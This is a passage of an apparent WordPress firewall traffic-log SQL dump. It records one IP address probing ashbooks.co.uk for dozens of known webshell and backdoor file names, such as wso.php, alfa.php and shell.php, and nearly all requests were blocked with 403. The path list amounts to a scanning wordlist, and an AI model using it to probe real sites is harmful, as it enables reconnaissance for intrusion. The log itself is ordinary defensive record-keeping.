AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GcCfEieYV674wvohbKHXR8sj',0,1636421561.0206,432,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-activer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MaCR6XcNe0Wsv8hpS4jOnZr1',0,1636421571.3346,406,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/task-check.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Lua6Yl870UeQoqRVxkBjhJKC',0,1636421580.4781,401,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KnkidcfSFyQ9M4epWO8Hahl1',0,1636421592.1213,415,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/405.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fyP7G4VbWjp59JIDdnR3wA8X',0,1636421601.6912,438,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','P2sONgbIGBmVwcidf4uxynJe',0,1636421609.1849,418,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5CuQml48AdH21R6FKngtXSOf',0,1636421613.6265,452,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TkXhqoG6HldLQeBy0SrR3N9U',0,1636421617.8876,403,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-content/plugins/ubh/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','onILruxhfibmDqCpgRQES2BH',0,1636421629.8352,406,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','L8UDSYFIowe1sEjC6vNqgVzW',0,1636421634.3010,429,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0cwkMlaE8eH3nCYRSuivFD2d',0,1636421642.9688,416,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dqoPtwT8J3WCfe1xYnkUmFXI',0,1636421657.2626,445,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pe0OJ6Q7M24SiloacCW3BsG5',0,1636421670.5230,457,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','94tkg8sDxzOYZj5fRv1qaVUQ',0,1636421675.2363,411,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wNgjPAGYXel2VpEuiqcvWHJd',0,1636421683.0470,406,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lFkiozE8XSNyOhnPaZBrATwV',0,1636421691.9740,684,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qSht68vcXYmIULlTZ2xf7GN5',0,1636421703.7894,393,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fnb3GFEkJTy6cDHvljKUWZp2',0,1636421715.4096,442,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KNeMG9XhjbA6F2415kLSVDr8',0,1636421730.1985,426,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dBqr8nHzm6cWGvI1k4Vt9MNR',0,1636421740.8260,458,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6cPWKVbdsFyM3XG1zStCrAfi',0,1636421747.0751,413,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','laY5NByeGofz7MhQ6cdjxD8S',0,1636421760.9075,454,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PuQx6Sw3IEsZMLk1jvnH9qah',0,1636421769.0802,448,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rU3NbVzBp6uO70qfYZRmwoiQ',0,1636421778.0191,451,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rtFxUuDNnPOfKkIyj90VXHia',0,1636421784.1097,410,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lEjCALR0G8aWQtXvH5FY1sZ7',0,1636421799.4782,414,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fo5G3BpaJR62KkzFmwqrliYC',0,1636421824.2017,457,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2HmGxKOrWpBQCDYzXUiNtM1e',0,1636421862.8200,445,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0fyH4PQBsog31TLctJ5lDeFv',0,1636421872.6006,417,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jkNUlF1n5yJwrsEaoZ0vz8bi',0,1636421878.3160,479,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Zn0XlGd8NcIL6J57srybueqD',0,1636421896.6495,481,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8AIzGLpJm2Nb0dDSkvuXcfPa',0,1636421910.0619,646,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SemqIdCPWH2oDhi7QuZ3OXYl',0,1636421917.4855,398,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VvY0JFAsj9lWD5aPumpzHNdo',0,1636421928.0380,421,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tqLMlUxX0EaZN7p14jJkAR8n',0,1636421932.4079,391,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QfILrHq3xe6jG87NSwcmso5B',0,1636421938.2607,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sTlvqKCwzhbUFAXZpN8R3JI5',0,1636421947.6391,402,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3AoBSi1dMRX2Nv6hEUl74jIG',0,1636421956.7896,469,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KvxEWcHXuP8o5FqVze6UMpG0',0,1636421969.6639,436,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1btwvCorjFWVM0zDERNxpPca',0,1636421976.9030,395,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WgoeEQIb3a16U5DLKAHSrwdX',0,1636421991.4210,404,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jrc8yV7Q4uIYnR3PW5a0tbMC',0,1636421997.8801,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W3ilhSPskuA59mDqnEKLFQo2',0,1636422008.0550,746,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EbPtnL1zG5m2duhgUqMaKxsl',0,1636422024.5885,455,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iFmKzYs6phJXR3MTxSgyQvjA',0,1636422032.5589,663,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rs9IY80nBqcu26zTMURoNwtb',0,1636422050.3749,475,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PO3I4DC5bNt7n1isQmVMgeaW',0,1636422076.7465,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sPRjzT3X5tV7IKSZkxiy08E4',0,1636422097.4087,461,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C96fb5L72eaJZo1Enhg8cMr3',0,1636422107.5712,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','17B30MWCQTnhlS2ULxXr98qe',0,1636422127.9954,447,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tnab5hmRNfskdDy06qK3zT8A',0,1636422158.5655,441,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8jZAyQMJ7DTKebOxEIUPwzv1',0,1636422163.7900,395,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Jj7p8UMhbWl0NZRyDgruYcGX',0,1636422179.1704,421,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AcZLPW75YE4k9xSDaIBOT3dX',0,1636422184.8865,435,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RMHeLXZhg3PNw48jGBUOn0J1',0,1636422193.0734,409,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VCLB8F9nUzRtkqDj0cGKWfbI',0,1636422204.1421,439,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','F1SsOxmtDlG56kLycJq3hgHM',0,1636422211.7840,397,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/zeb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','loeQYtu7wgGN2U54TXRjp3rO',0,1636422220.5848,423,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/zab.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rQNaBRItUKubJ3wjvGLg19ol',0,1636422226.8099,399,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PJXoCqb3vhT7lejdwVuc2zEy',0,1636422236.3684,410,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6tcyUXlLA1h8xRFIG9CWpSqY',0,1636422242.3990,456,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iatdFuZ4xqh16bP9mGYB7Epo',0,1636422252.1480,426,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W2Dkpi3hd8ubyf4sBFt9Ez1m',0,1636422282.1823,443,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PtQuoqBGWyRlkhmIDXVCsOUL',0,1636422293.4311,438,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GKj538YHdauVmTgyikwBxLnI',0,1636422300.1516,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z0BfvyHPXMS4aNVDEmlckgOU',0,1636422315.0054,455,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zQieurIVvdH7JbxaDPS534nN',0,1636422328.0188,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jk1lMZwTJfm8eOIFnp5h4GrL',0,1636422342.8070,425,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','e0jrMmPqzJGinVX3fCyS6duE',0,1636422351.8873,401,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','smnJ9x5N1VKdp6i7S8hwURGI',0,1636422356.8360,424,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ta1mFCLISY7Edjg20zl3Ocf8',0,1636422372.8926,437,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ad5EOh7Rbi9mgVqj8rFWDeck',0,1636422383.5393,406,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y0ARd8HGoVXPcmDphTlNOqJj',0,1636422388.0847,404,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','e3MXoJiD8jhrKyR1pQ5ZPsdB',0,1636422399.6728,436,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YFSogmIzWhpeaMKfv3nPxCt2',0,1636422412.8497,450,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','O5WKNjBkI3SclE41FUwDvhoZ',0,1636422417.6204,411,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NRB2bjyfp7WnaCV1k4sJrXdu',0,1636422421.5198,430,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lAQz1odgiGyc02a7xwNkqKPD',0,1636422425.3100,433,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mscQDSxnOu0I7Ji293qpCobr',0,1636422453.2462,403,'','GET',404,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lErfk5MapJQFbXG2o8mqjTOV',0,1636422462.0162,409,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QWALni4g2useVrkJG731acoB',0,1636422473.1455,430,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 